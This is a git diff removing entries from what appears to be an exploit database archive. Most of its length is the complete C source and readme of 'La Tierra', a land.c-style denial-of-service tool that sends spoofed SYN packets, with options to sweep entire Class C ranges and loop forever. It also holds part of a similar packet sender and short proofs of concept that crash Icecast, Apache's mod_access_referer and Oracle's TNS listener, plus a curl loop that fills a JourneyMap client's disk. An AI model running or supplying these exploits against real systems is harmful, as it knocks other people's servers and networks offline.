getaddrinfo(argv[2],0, &hints, &addrinfo); - if ( retVal!=0 ) - { - WSACleanup(); - fprintf( stderr, "Error in getaddrinfo():%d\n",WSAGetLastError()); - exit(EXIT_FAILURE); - } - - // - // Open WinPCap adapter - // - if ( (pcap_handle = pcap_open_live (argv[1], 1514, PCAP_OPENFLAG_PROMISCUOUS, 100, (char*)errbuf)) == NULL ) - { - freeaddrinfo(addrinfo); - WSACleanup(); - fprintf(stderr, "Error opening device: %s\n",argv[1]); - return EXIT_FAILURE; - } - - ZeroMemory(packet,sizeof(packet)); - struct sockaddr_in6 *sa = (struct sockaddr_in6 *) addrinfo->ai_addr; - - // fill ethernet header - eth_hdr->ether_dhost[0] = eth_hdr->ether_shost[0] = 0;// assume address like 00:something; - eth_hdr->ether_dhost[1] = eth_hdr->ether_shost[1] = sa->sin6_addr.u.Byte[9]; - eth_hdr->ether_dhost[2] = eth_hdr->ether_shost[2] = sa->sin6_addr.u.Byte[10]; - eth_hdr->ether_dhost[3] = eth_hdr->ether_shost[3] = sa->sin6_addr.u.Byte[13]; - eth_hdr->ether_dhost[4] = eth_hdr->ether_shost[4] = sa->sin6_addr.u.Byte[14]; - eth_hdr->ether_dhost[5] = eth_hdr->ether_shost[5] = sa->sin6_addr.u.Byte[15]; - eth_hdr->ether_type = 0xdd86; - - - // fill IP header - // source ip == destination ip - memcpy(ip6_hdr->ip_src.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte)); - memcpy(ip6_hdr->ip_dst.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte)); - ip6_hdr->ip_hl = 255; - ip6_hdr->ip_nh = IPPROTO_TCP; - ip6_hdr->ip_len = htons (20); - ip6_hdr->ip_flags[0] = 0x06 << 4; - srand((unsigned int) time(0)); - // fill tcp header - tcp_hdr->th_sport = tcp_hdr->th_dport = htons (atoi(argv[3])); // source port equal to destination - tcp_hdr->th_seq = rand(); - tcp_hdr->th_ack = rand(); - tcp_hdr->th_off = htons(5); - tcp_hdr->th_win = rand(); - tcp_hdr->th_sum = 0; - tcp_hdr->th_urp = htons(10); - tcp_hdr->th_off = 5; - tcp_hdr->th_flags = 2; - // calculate tcp checksum - int chsum = libnet_in_cksum ((u_int16_t *) & ip6_hdr->ip_src, 32); - chsum += ntohs (IPPROTO_TCP + sizeof (struct libnet_tcp_hdr)); - chsum += libnet_in_cksum ((u_int16_t *) tcp_hdr, sizeof (struct libnet_tcp_hdr)); - tcp_hdr->th_sum = LIBNET_CKSUM_CARRY (chsum); - // send data to wire - retVal = pcap_sendpacket (pcap_handle, (u_char *) packet, sizeof(packet)); - if ( retVal == -1 ) - { - fprintf(stderr,"Error writing packet to wire!!\n"); - } - // - // close adapter, free mem.. etc.. - // - pcap_close(pcap_handle); - freeaddrinfo(addrinfo); - WSACleanup(); - return EXIT_SUCCESS; -} - --- -NTBugtraq Editor's Note: - -Most viruses these days use spoofed email addresses. As such, using an Anti-Virus product which automatically notifies the perceived sender of a message it believes is infected may well cause more harm than good. Someone who did not actually send you a virus may receive the notification and scramble their support staff to find an infection which never existed in the first place. Suggest such notifications be disabled by whomever is responsible for your AV, or at least that the idea is considered. --- diff --git a/platforms/multiple/remote/20813.c b/platforms/multiple/remote/20813.c deleted file mode 100755 index 8d23332d3..000000000 --- a/platforms/multiple/remote/20813.c +++ /dev/null @@ -1,852 +0,0 @@ -source: http://www.securityfocus.com/bid/2666/info - -A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00. - -It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue. - -**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. - -/**************************************************************/ -/* */ -/* La Tierra v1.0b - by MondoMan (KeG), elmondo@usa.net */ -/* */ -/* Modified version of land.c by m3lt, FLC */ -/* */ -/* Compiled on RedHat Linux 2.0.27, Intel Pentium 200Mhz */ -/* gcc version 2.7.2.1 tabs set to 3 */ -/* */ -/* gcc latierra.c -o latierra */ -/* */ -/* Refer to readme.txt for more details and history */ -/* */ -/**************************************************************/ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define DEFAULT_FREQUENCY 1 -#define TRUE 1 -#define FALSE 0 -#define FOR_EVER -5 -#define LIST_FILE 1 -#define ZONE_FILE 2 -#define MAXLINELENGTH 512 -#define DEFAULT_SEQ 0xF1C -#define DEFAULT_TTL 0xFF -#define DEFAULT_TCPFLAGS (TH_SYN | TH_PUSH) -#define DEFAULT_WINSIZE 0xFDE8 - -struct pseudohdr - { - struct in_addr saddr; - struct in_addr daddr; - u_char zero; - u_char protocol; - u_short length; - struct tcphdr tcpheader; - }; - -typedef struct latierra_data - { - char dest_ip[256]; - int tcp_flags; - int window_size; - int ip_protocol; - int sequence_number; - int ttl; - int supress_output; - int message_type; - } LATIERRA_DATA; - -void alternatives(void); -int get_ip(int use_file, FILE *fp, char *buff); -int land(LATIERRA_DATA *ld, int port_number); -void nslookup_help(void); -void print_arguments(void); -void protocol_list(void); - -/********/ -/* main */ -/********/ -int main(int argc, char **argv) -{ - FILE *fp; - LATIERRA_DATA ld; - int frequency = DEFAULT_FREQUENCY, x; - int beginning_port=1, octet=1, scan_loop=0, loop_val=0, use_file=FALSE; - int ending_port = 0, loop = TRUE, i = 0, increment_addr = FALSE; - char got_ip = FALSE, got_beg_port = FALSE; - char class_c_addr[21], filename[256], buff[512], valid_tcp_flags[16]; - - printf("\nlatierra v1.0b by MondoMan (elmondo@usa.net), KeG\n"); - printf("Enhanced version of land.c originally developed by m3lt, FLC\n"); - - strcpy(valid_tcp_flags, "fsrpau"); - ld.tcp_flags = 0; - ld.window_size = DEFAULT_WINSIZE; - ld.ip_protocol = IP_TCP; - ld.sequence_number = DEFAULT_SEQ; - ld.ttl = DEFAULT_TTL; - ld.message_type = 0; - - if(argc > 1 && (!strcmp(argv[1], "-a"))) - alternatives(); - - if(argc > 1 && (!strcmp(argv[1], "-n"))) - nslookup_help(); - - if(argc > 1 && (!strcmp(argv[1], "-p"))) - protocol_list(); - - if(argc == 1 || ( (argc >= 2) && (!strcmp(argv[1], "-h")))) - print_arguments(); - - while((i = getopt(argc, argv, "i:b:e:s:l:o:t:w:p:q:v:m:")) != EOF) - { - switch(i) - { - case 't': - for(x=0;x 1) - strcpy(ld.dest_ip, optarg); - else - { - printf("ERROR: Must specify valid IP or hostname.\n"); - return(-6); - } - got_ip = TRUE; - break; - case 's': - frequency = atoi(optarg); - break; - case 'l': - loop = atoi(optarg); - break; - case 'b': - beginning_port = atoi(optarg); - got_beg_port = TRUE; - break; - case 'e': - ending_port = atoi(optarg); - break; - } - } - - if(!ld.tcp_flags) - ld.tcp_flags = DEFAULT_TCPFLAGS; - - if(!got_beg_port) - { - fprintf(stderr, "\nMust specify beginning port number. Use -h for help with arguments.\n\n"); - return(-7); - } - - if(ending_port == 0) - ending_port = beginning_port; - - printf("\nSettings:\n\n"); - - printf(" (-i) Dest. IP Addr : "); - - if(ld.dest_ip[strlen(ld.dest_ip) -1] == '-') - { - ld.dest_ip[strlen(ld.dest_ip)-1] = 0x0; - strcpy(class_c_addr, ld.dest_ip); - strcat(ld.dest_ip, "1"); - printf(" %s (Class C range specified).\n", ld.dest_ip); - increment_addr = TRUE; - octet = 1; - } - else - if(strlen(ld.dest_ip) > 5) - { - if(strncmp(ld.dest_ip, "zone=", 5)==0) - { - strcpy(filename, &ld.dest_ip[5]); - printf("%s (using DNS zone file)\n", filename); - use_file = ZONE_FILE; - } - else if(strncmp(ld.dest_ip, "list=", 5) == 0) - { - strcpy(filename, &ld.dest_ip[5]); - printf("%s (using ASCII list)\n", filename); - use_file = LIST_FILE; - } - else - printf("%s\n", ld.dest_ip); - } - else - { - printf("Destination specifier (%s) length must be > 7.\n", ld.dest_ip); - return(-9); - } - - printf(" (-b) Beginning Port #: %d\n", beginning_port ); - printf(" (-e) Ending Port # : %d\n", ending_port ); - printf(" (-s) Seconds to Pause: %d\n", frequency ); - printf(" (-l) Loop : %d %s\n", loop, (loop == FOR_EVER) ? "(forever)" : " " ); - printf(" (-w) Window size : %d\n", ld.window_size ); - printf(" (-q) Sequence Number : %X (%d)\n",ld.sequence_number, ld.sequence_number ); - printf(" (-v) Time-to-Live : %d\n", ld.ttl); - printf(" (-p) IP Protocol # : %d\n", ld.ip_protocol ); - printf(" (-t) TCP flags : "); - - strcpy(buff, ""); - - if( ld.tcp_flags & TH_FIN) - strcat(buff, "fin "); - if( ld.tcp_flags & TH_SYN) - strcat(buff, "syn "); - if(ld.tcp_flags & TH_RST) - strcat(buff, "rst "); - if(ld.tcp_flags & TH_PUSH) - strcat(buff, "push "); - if(ld.tcp_flags & TH_ACK) - strcat(buff, "ack "); - if(ld.tcp_flags & TH_URG) - strcat(buff, "urg "); - - printf("%s\n\n", buff); - - if(ending_port < beginning_port) - { - printf("\nERROR: Ending port # must be greater than beginning port #\n\n"); - return(-8); - } - - scan_loop = loop_val = loop; - - if(use_file) - { - if(access(filename, 0)) - { - printf("\nERROR: The file you specified (%s) cannot be found.\n\n", filename); - return(-9); - } - - if( (fp = fopen(filename, "rt")) == NULL) - { - printf("ERROR: Unable to open %s.\n", filename); - return(-10); - } - - if(!get_ip(use_file, fp, buff)) - { - printf("Unable to get any IP address from file %s.\n"); - return(-11); - } - - strcpy(ld.dest_ip, buff); - } - - while( (loop == FOR_EVER) ? 1 : loop-- > 0) - { - for(i=beginning_port; i <= ending_port; i++) - { - if(land(&ld, i)) /* go for it BaBy! */ - break; - - if(frequency) /* make sure freq > 0 */ - { - if(!ld.supress_output) - printf("-> paused %d seconds.\n", frequency); - sleep(frequency); - } - } - - if( (!use_file) && (loop && increment_addr) ) - { - char temp_addr[21]; - - if(++octet > 254) /* check for reset */ - { - if(loop_val != FOR_EVER) /* make sure not to distrute forever! */ - { - if(++scan_loop > loop_val) /* check if scanned x times */ - break; - else - loop = loop_val; /* restore original value */ - } - octet = 1; /* reset */ - } - - sprintf(temp_addr, "%s%d", class_c_addr, octet); - strcpy(ld.dest_ip, temp_addr); - - if(!ld.supress_output) - printf("** incrementing to next IP address: %s\n", ld.dest_ip); - - if(scan_loop > loop_val) - break; /* break while loop */ - } - else if(use_file) - { - if(!get_ip(use_file, fp, buff)) - break; - - loop++; - - strcpy(ld.dest_ip, buff); - } - - } /* end while */ - - printf("\nDone.\n\n"); -} /* end main */ - -int get_ip(int use_file, FILE *fp, char *buff) -{ - if(use_file == LIST_FILE) - return(get_ip_from_list(fp, buff)); - - return(get_ip_from_zone(fp, buff)); -} - -int get_ip_from_list(FILE *fp, char *buff) -{ - int ret_val; - - while(1) - { - ret_val = (int)fgets(buff, MAXLINELENGTH, fp); - - if((ret_val == EOF) || (ret_val == (int)NULL)) - return 0; - - if( strlen(buff) >= 7) - if((buff[0] != ';') && (buff[0] != '[')) - { - if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') ) - buff[strlen(buff)-1] = 0x0; - - return 1; - } - } - - return 0; -} - -int get_ip_from_zone(FILE *fp, char *buff) -{ - int ret_val, i; - char *p, delim[8]; - - strcpy(delim, " \t"); - - while(1) - { - ret_val = (int)fgets(buff, MAXLINELENGTH, fp); - - if((ret_val == EOF) || (ret_val == (int)NULL)) - return 0; - - if( strlen(buff) >= 7) - if((buff[0] != ';') && (buff[0] != '[') && (strncmp(buff, "ls -d", 5) != 0)) - { - if( (p = strtok( buff, delim)) == NULL) - continue; - - if( (p = strtok(NULL, delim)) == NULL) - continue; - - if(strcmp(p, "A")) /* be sure second column is an DNS A record */ - continue; - - if( (p = strtok(NULL, delim)) == NULL) - continue; - - strcpy(buff, p); - - /* verify that we have a valid IP address to work with */ - - if(inet_addr(p) == -1) - continue; - - /* strip off training line characters */ - - if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') ) - buff[strlen(buff)-1] = 0x0; - - return 1; - } - } - - return 0; -} - -/************/ -/* checksum */ -/************/ -u_short checksum(u_short * data,u_short length) -{ - register long value; - u_short i; - - for(i = 0; i< (length >> 1); i++) - value += data[i]; - - if((length & 1)==1) - value += (data[i] << 8); - - value = (value & 0xFFFF) + (value >> 16); - - return(~value); -} - -/********/ -/* land */ -/********/ -int land(LATIERRA_DATA *ld, int port_number) -{ - struct sockaddr_in sin; - int sock; - char buffer[40]; - struct iphdr * ipheader = (struct iphdr *) buffer; - struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr)); - struct pseudohdr pseudoheader; - - bzero(&sin,sizeof(struct sockaddr_in)); - - sin.sin_family=AF_INET; - - if((sin.sin_addr.s_addr=inet_addr(ld->dest_ip))==-1) - { - printf("ERROR: unknown host %s\n", ld->dest_ip); - return(-1); - } - - if((sin.sin_port=htons(port_number))==0) - { - printf("ERROR: unknown port %s\n",port_number); - return(-2); - } - - if((sock=socket(AF_INET,SOCK_RAW,255))==-1) - { - printf("ERROR: couldn't allocate raw socket\n"); - return(-3); - } - - bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr)); - - ipheader->version=4; - ipheader->ihl=sizeof(struct iphdr)/4; - ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr)); - ipheader->id=htons(ld->sequence_number); - ipheader->ttl = ld->ttl; - ipheader->protocol = ld->ip_protocol; - ipheader->saddr=sin.sin_addr.s_addr; - ipheader->daddr=sin.sin_addr.s_addr; - - tcpheader->th_sport = sin.sin_port; - tcpheader->th_dport = sin.sin_port; - tcpheader->th_seq = htonl(ld->sequence_number); - tcpheader->th_flags = ld->tcp_flags; - tcpheader->th_off = sizeof(struct tcphdr)/4; - tcpheader->th_win = htons(ld->window_size); - - bzero(&pseudoheader,12+sizeof(struct tcphdr)); - - pseudoheader.saddr.s_addr=sin.sin_addr.s_addr; - pseudoheader.daddr.s_addr=sin.sin_addr.s_addr; - pseudoheader.protocol = ld->ip_protocol; - pseudoheader.length = htons(sizeof(struct tcphdr)); - bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr)); - tcpheader->th_sum = checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr)); - - if( sendto(sock, buffer, - sizeof(struct iphdr)+sizeof(struct tcphdr), - ld->message_type, - (struct sockaddr *) &sin, - sizeof(struct sockaddr_in) )==-1) - { - printf("ERROR: can't send packet. (sendto failed)\n"); - return(-4); - } - - if(!ld->supress_output) - printf("-> packet successfully sent to: %s:%d\n", ld->dest_ip, port_number); - - close(sock); - - return(0); -} -/* End of land */ - -void alternatives() -{ - printf("\nAlternative command line arguments for option -i\n\n"); - - printf(" You can create two types of files that latierra can use to get\n"); - printf(" a list of IP addresses, a simple ASCII file with each IP address\n"); - printf(" appearing on each line or better yet, a DNS zone file created by\n"); - printf(" nslookup. If you are unfamiliar with nslookup, specify a '-n' on the\n"); - printf(" command line of latierra.\n\n"); - printf(" Basically, latierra will walk down the list and send the spoofed packet\n"); - printf(" to each IP address. Once the list is complete, and loop > 1, the list\n"); - printf(" is repeated. To specify that the '-i' option should use a zone file,\n"); - printf(" specify \"zone=filename.txt\" instead of an IP address. To specify a \n"); - printf(" simple ASCII list of IP addresses, use \"list=filename.txt\". Lines\n"); - printf(" beginning with ';' or '[' are ignored. Lines that are not an 'A' \n"); - printf(" record (second column)in a zone file will ignored.\n\n"); - - exit(-1); -} - -void nslookup_help() -{ - printf("\nNSLOOKUP help\n\n"); - - - printf("To see who is the DNS server for a particular domain, issue the following:\n"); - printf(" > set type=ns\n"); - printf(" > xyz.com\n\n"); - printf(" You will see a list of the name server(s) if completed successfully\n\n"); - - printf("To get a list of all the DNS entries for a particular domain, run nslookup\n"); - printf("and issue the following commands:\n"); - printf(" > server 1.1.1.1\n"); - printf(" > ls -d xyz.com > filename.txt\n\n"); - - printf("Line 1 sets the server that nslookup will use to resolve a name.\n"); - printf("Line 2 requires all the information about xyz.com be written to filename.txt\n\n"); - - exit(-1); -} - -void protocol_list() -{ - printf("\nProtocol List:\n\n"); - printf("Verified:\n"); - printf("1-ICMP 2-IGMP 3-GGP 5-ST 6-TCP 7-UCL 8-EGP 9-IGP 10-BBN_RCC_MON\n"); - printf("11-NVP11 13-ARGUS 14-EMCON 15-XNET 16-CHAOS 17-UDP 18-MUX\n"); - printf("19-DCN_MEAS 20-HMP 21-PRM 22-XNS_IDP 23-TRUNK1 24-TRUNK2\n"); - printf("25-LEAF1 26-LEAF2 27-RDP 28-IRTP 29-ISO_TP4 30-NETBLT\n"); - printf("31-MFE_NSP 32-MERIT_INP 33-SEP 34-3PC 62-CFTP 64-SAT_EXPAK\n"); - printf("66-RVD 67-IPPC 69-SAT_MON 70-VISA 71-IPCV\n"); - printf("76-BR_SAT_MON 77-SUN_ND 78-WB_MON 79-WB_EXPAK 80-ISO_IP\n"); - printf("81-VMTP 82-SECURE_VMTP 83-VINES 84-TTP 85-NSFNET_IGP 86-DGP\n"); - printf("87-TCF 88-IGRP 89-OSPFIGP 90-SPRITE_RPG 91-LARP\n\n"); - printf("Supported:\n"); - printf(" 6-TCP 17-UDP (future: PPTP, SKIP) \n\n"); - - exit(-1); -} - -void print_arguments() -{ - printf("Arguments: \n"); - printf(" * -i dest_ip = destination ip address such as 1.1.1.1\n"); - printf(" If last octet is '-', then the address will increment\n"); - printf(" from 1 to 254 (Class C) on the next loop\n"); - printf(" and loop must be > 1 or %d (forever).\n", FOR_EVER); - printf(" Alternatives = zone=filename.txt or list=filename.txt (ASCII)\n"); - printf(" For list of alternative options, use -a instead of -h.\n"); - printf(" * -b port# = beginning port number (required).\n"); - printf(" -e port# = ending port number (optional)\n"); - printf(" -t = tcp flag options (f=fin,~s=syn,r=reset,~p=push,a=ack,u=urgent)\n"); - printf(" -v = time_to_live value, default=%d\n", DEFAULT_TTL); - printf(" -p protocol = ~6=tcp, 17=udp, use -p option for complete list\n"); - printf(" -w window_size = value from 0 to ?, default=%d\n", DEFAULT_WINSIZE); - printf(" -q tcp_sequence_number, default=%d\n", DEFAULT_SEQ); - printf(" -m message_type (~0=none,1=Out-Of-Band,4=Msg_DontRoute\n"); - printf(" -s seconds = delay between port numbers, default=%d\n", DEFAULT_FREQUENCY); - printf(" -o 1 = supress additional output to screen, default=0\n" ); - printf(" -l loop = times to loop through ports/scan, default=%d, %d=forever\n", 1, FOR_EVER); - printf(" * = required ~ = default parameter values\n\n"); - exit(-1); -} -/* End of file */ - - ------------------ readme.txt ------------------------------ - -La Tierra v1.0b - by MondoMan (KeG), elmondo@usa.net - - Modified version of land.c by m3lt, FLC - -To compile latierra, type: - - gcc latierra.c -o latierra - - To see the help screen, use 'latierra -h' - -This program crashes Windows 95, and will cause Windows NT -4.0, SP3 to utilize a high percentage of CPU. In some -instances, CPU usage reaches %100. - -land.c description: - -land.c sends a spoofed packet with the SYN flag from the -the same IP and port number as the destination. For -example, if you want to do a DoS on 1.1.1.1, port 80, it would -spoof 1.1.1.1 port 80 as the source. The problem is with -NT4 SP3, however, is once you issue this packet to a -port, NT4 SP3 appears to ignore all other attempts - - -UNTIL ... - - La Tierra! - -La Tierra description: - -La Tierra basically works by sending NT the same packet -used in land.c but to more than one port (if specified). -It doesn't appear to matter if the port is opened or closed! -NT doesn't appear to let this happen again on the same port -successively, but you simply change ports, and you can easily -go back to the original port and it'll work again. What's even -more interesting is the fact that port 139 works with this. -You would have thought - I'll leave that alone for now! - -While testing, I used a Compaq dual Intel Pentium Pro 200, and -was able to take up to %64 CPU. With one processor disabled, -CPU usage was %100. NT4 SP3 doesn't seem to crash, just needs -time to recover, even with one spoofed packet. - -Features include: - - - Ability to launch a DoS on an entire class C address - - Specify the beginning and ending port range - - Specify the number of loops or make it loop forever! - - User defined TCP flags: fin, syn, reset, push, ack, - and urgent - - Other IP options such as window size, time-to-live, - sequence_number, and message_type - - Ability to read a DNS zone file for IP addresses - - Ability to read a ASCII file containing IP addresses - -Command line options: - - - i ip_address - - DEFAULT: None - RANGE: Valid IP Address - OPTIONAL: No - - where ip_address is a valid ip_address, or if you wish to - cycle through a class C address, the last octet is dropped - and replaced with a '-'. This option is required. The - source and destination address are obtained from this value. - - Rather than specifying an IP address, you may wish to create - an ASCII file, or better yet, use nslookup to obtain all - zone information for a particular domain. The ASCII file - simply contains a list of IP addresses, one on each line. - - To get a DNS file, simply use nslookup, and the - "ls -d somedomain.com > filename.txt" command. You can use - 'latierra -n' to read more about the command sequence for - nslookup. - - In both types of files, lines that begin with ';' or '[' are - ignored. In DNS files, only 'A' records are processed. - - Examples: - - Single IP Address: - -i 10.1.2.1 - - Class C range: - -i 10.1.2.- - - ASCII file: - -i list=filename.txt - - DNS file: - -i zone=filename.txt - - -b beginning_port_number - - DEFAULT: None - RANGE: Positive Integer - OPTIONAL: No - - where this value is the port_number that latierra will use. If - no ending_port_number is specified, ending_port_number is then - equal to this value. Valid range is 1 to 0xFFFF - - -e ending_port_number - - DEFAULT: If not specified, equal to beginning_port_number - RANGE: Positive Integer - OPTIONAL: Yes - - is the highest port number in the range to cycle through. - - Example: - - -i 10.1.2.1 -b 23 -e 80 - - will start at port 23 and increment up to port 80. You can - delay the next increment by using the -s option. Valid range - is 1 to 0xFFFF - - -s seconds_between_spoofs - - DEFAULT: 1 - RANGE: Positive Integer - OPTIONAL: Yes - - You may want to control the seconds between spoofs. If you - specify a zero, no delays occur. - - In the below example, the spoof will between ports 23 and 80, - every 3 seconds. - - -i 10.1.2.1 -b 23 -e 80 -s 3 - - -l number_of_loops - - DEFAULT: 1 - RANGE: Positive Integer, -5 loops forever - OPTIONAL: Yes - - This option if set greater than 1, will cause a repeat of the - cycle. For example: - - -i 10.1.2.1 -b 23 -e 80 -s 0 -l 8 - - will cause latierra to go through ports 23 through 80 and - repeat the process 8 times, with no delay. Look at the - following example: - - -i 10.1.2.- -b 23 -e 80 -s 0 -l 8 - - latierra will start at 10.1.2.1, port 23 through 80, then - increment to 10.1.2.2, port 23 through 80, and so on until - it gets to 10.1.2.254, in which case it will repeat the - same procedure over again 8 times. - - By specifying a value of -5 for this option, latierra will - loop forever, until you manually stop the process. In the - last example above, the procedure would never end. When it - reaches 10.1.2.254, it falls back to 10.1.2.1 and start - over again from there. - - Other examples: - - -i 10.1.2.1 -b 139 -s 0 -l -5 - -i 10.1.2.- -b 80 -s 5 -l 10 - - -t tcp_flags - - DEFAULT: sp (SYN, PUSH) - RANGE: valid character set (see below) - OPTIONAL: Yes - - this option sets the various TCP flags, which include: - - f = fin s = syn r = reset - p = push a = ack u = urgent - - Example: - - -i 10.1.2.1 -b 139 -t apu -s 0 - - To set the ack, push, and urgent flag - - -v time_to_live_value - - DEFAULT: 0xFF (255 decimal) - RANGE: Positive Integer - OPTIONAL: Yes - - Sets the time to live value. - - -p protocol_value - - DEFAULT: 6 (tcp) - RANGE: Positive Integer - OPTIONAL: Yes - - Sets the protocol value in the IP header. To see a list of - available protocols, run "latierra -p". - - -w window_size_value - - DEFAULT: 0xFFFF (65000 decimal) - RANGE: Positive long value - OPTIONAL: Yes - - -q tcp_sequence_number_value - - DEFAULT: 0xF1C - RANGE: Positive integer - OPTIONAL: Yes - - -o 1 supress_additional_output - - DEFAULT: messages are printed for status - RANGE: None - OPTIONAL: Yes - - If you don't want to see the messages during the process, - simply use this "-o 1" to turn them off. - -Final Note: - -Please use this program for in-house testing purposes only. - -Just because your sending spoofed packets, doesn't mean you -can't be traced. - -Good luck. - -- MondoMan -elmondo@usa.net - --------------------- end of file ------------------------------- diff --git a/platforms/multiple/remote/20973.txt b/platforms/multiple/remote/20973.txt deleted file mode 100755 index 18ba85601..000000000 --- a/platforms/multiple/remote/20973.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/2933/info - -Icecast is an open source audio-streaming server for both Unix and Microsoft Windows systems. - -Icecast does not sufficiently sanitize user-supplied input, or sanely handle unexpected input. Upon receiving a request from a user for a file that ends with a slash or period, the server will crash. The behaviour occurs when the remote attacker adds an '/', '\' or '.' to the end the URL they craft to request the file. The request of an existing file is not necessary, as the Icecast server will fail regardless. - -http://localhost:8000/file// - -NOTE: File is interpreted by Icecast as the 'root' directory and anything after 'file/' indicates the file request. The character '/' triggers the denial of service. diff --git a/platforms/multiple/remote/22505.txt b/platforms/multiple/remote/22505.txt deleted file mode 100755 index e3c9c1750..000000000 --- a/platforms/multiple/remote/22505.txt +++ /dev/null @@ -1,5 +0,0 @@ -source: http://www.securityfocus.com/bid/7375/info - -A vulnerability has been reported for the mod_access_referer Apache module. The problem occurs when parsing invalid HTTP referer header fields. If this vulnerability were to be triggered, it may be possible to trigger a NULL pointer dereference, effectively causing Apache to segfault. - -Referer: ://its-missing-http.com \ No newline at end of file diff --git a/platforms/multiple/remote/23231.txt b/platforms/multiple/remote/23231.txt deleted file mode 100755 index dd5d65373..000000000 --- a/platforms/multiple/remote/23231.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/8787/info - -It has been reported that Medieval Total War may be prone to a denial of service vulnerability. The issue is caused when an attacker sends a malformed value for nickname consisting of 0 Unicode characters to the server during the initial authentication process. The exploitation of this issue results in the all users receiving a "Connection expired" message before leading to a crash of the server. - -Successful exploitation of this issue may allow an attacker to cause the software to crash or hang. - -Medieval Total War versions 1.1 and prior are reported to be prone to this vulnerability. - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23231.zip \ No newline at end of file diff --git a/platforms/multiple/remote/25692.txt b/platforms/multiple/remote/25692.txt deleted file mode 100755 index 00ff9866a..000000000 --- a/platforms/multiple/remote/25692.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/13712/info - -Warrior Kings: Battles is susceptible to a remote denial of service vulnerability. This is due to a failure of the game server to properly handle exceptional conditions. - -This vulnerability allows remote attackers to crash affected game servers, denying access to legitimate users. - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/25692.zip \ No newline at end of file diff --git a/platforms/multiple/remote/26336.txt b/platforms/multiple/remote/26336.txt deleted file mode 100755 index e8169db73..000000000 --- a/platforms/multiple/remote/26336.txt +++ /dev/null @@ -1,11 +0,0 @@ -source: http://www.securityfocus.com/bid/15039/info - -Oracle Forms is susceptible to a vulnerability that allows remote attackers to stop the TNS Listener service, denying further database service to legitimate users. - -By issuing a specific HTTP request, remote attackers may cause the affected application to stop the TNS Listener. - -This issue was reported in Oracle Forms versions prior to July 2005. - -This issue was originally described and addressed in Oracle Critical Patch Update - July 2005, BID 14238 (Oracle July Security Update Multiple Vulnerabilities). Due to the availability of more information, this issue is being assigned a separate BID. - -http://www.example.com:8888/forms90/f90servlet?form=test.fmx&userid=SCOTT/TIGER@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=server)(PORT=1521)))(CONNECT_DATA=(COMMAND=STOP)(SERVICE=LISTENER)))&buffer_records=NO&debug_messages=NO&array=YES&query_only=NO&quiet=NO&RENDER=YES \ No newline at end of file diff --git a/platforms/multiple/remote/32362.txt b/platforms/multiple/remote/32362.txt deleted file mode 100755 index 8c1b514d7..000000000 --- a/platforms/multiple/remote/32362.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/31140/info - -Unreal Engine is prone to a remote denial-of-service vulnerability because of an error in memory allocation. - -An attacker could exploit this issue to crash applications that use the vulnerable engine and deny service to legitimate users. - -This issue affects Unreal Engine 3; other versions may also be affected. - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32362.zip \ No newline at end of file diff --git a/platforms/multiple/remote/35339.txt b/platforms/multiple/remote/35339.txt deleted file mode 100755 index 280a7a310..000000000 --- a/platforms/multiple/remote/35339.txt +++ /dev/null @@ -1,38 +0,0 @@ -# Exploit Title: JourneyMap Disk-space consumption exploit -# Date: 23Nov2014 -# Exploit Author: CovertCodes -# Vendor Homepage: http://journeymap.techbrew.net/ -# Software Link: http://journeymap.techbrew.net/download/ -# Version: 5.0.0RC2 Ultimate Edition -# Tested on: Linux - - - JourneyMap (http://journeymap.techbrew.net/) is a mapping mod for -Minecraft. It comes included with some modpacks, and is enabled by -default in the popular Feed the Beast client. JourneyMap opens a web -server on the client which is configured to listen on port 8080. When -the client is running, a remote, unauthenticated user can have -JourneyMap save a screenshot of the game to the hard drive by accessing -a specific URL, consuming hard drive space. Here's an example: - -#!/bin/bash - while true; - do - curl -o /dev/null 192.168.1.1:8080/action?type=savemap&mapType=day - done - - This works even when the client has paused the game (by pressing -escape.) We include mapType=day because the software should refuse to -save a screenshot if the client user is underground, and the game is set -on hardcore mode. - - Accessing the URL and triggering a screenshot will display a message -on the client's screen, which may somewhat lessen the severity of this -exploit. Further, it takes a long time to fill up disk using this -technique. JourneyMap allows depth and resolution to be specified in -the URL as well, though a few simple tests showed no change despite -altering these parameters. If one were able to increase the depth and -resolution of the image, the drive would fill up faster. - - Tested with JourneyMap 5.0.0RC2 Ultimate Edition, but presumed to -work on other versions as well. diff --git a/platforms/multiple/remote/35465.pl b/platforms/multiple/remote/35465.pl deleted file mode 100755 index 8d4cf6c7b..000000000 --- a/platforms/multiple/remote/35465.pl +++ /dev/null @@ -1,58 +0,0 @@ -source: http://www.securityfocus.com/bid/46868/info - -VLC Media Player is prone to a denial-of-service 